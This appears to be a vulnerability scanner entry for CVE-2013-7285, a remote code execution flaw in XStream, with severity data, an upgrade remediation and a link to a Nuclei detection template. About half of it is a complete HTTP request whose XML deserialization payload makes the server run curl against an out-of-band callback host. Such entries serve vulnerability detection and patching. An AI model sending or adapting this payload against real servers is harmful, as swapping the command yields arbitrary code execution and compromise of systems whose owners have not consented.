| Title | XStream <1.4.6/1.4.10 - Remote Code Execution |
|---|---|
| Author | pwnhxl,vicrack |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. |
| Remediation | Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.15054 |
| CVE ID | CVE-2013-7285 |
| CWE ID | CWE-78 |
| Tags | cve2013 cve xstream deserialization rce oast xstream_project vuln |
Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3
Connection: close
Content-Length: 504
Content-Type: application/xml
Accept-Encoding: gzip
<sorted-set>
<string>foo</string>
<contact class='dynamic-proxy'>
<interface>java.lang.Comparable</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>curl</string>
<string>http://d5jqv89le0o0m06etqsgs4jr58unkf6tn.oast.pro</string>
</command>
</target>
<action>start</action>
</handler>
</contact>
</sorted-set>
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml
🦈 Packet Capture: ⬇️ Download cve-2013-7285.pcap
N/AN/A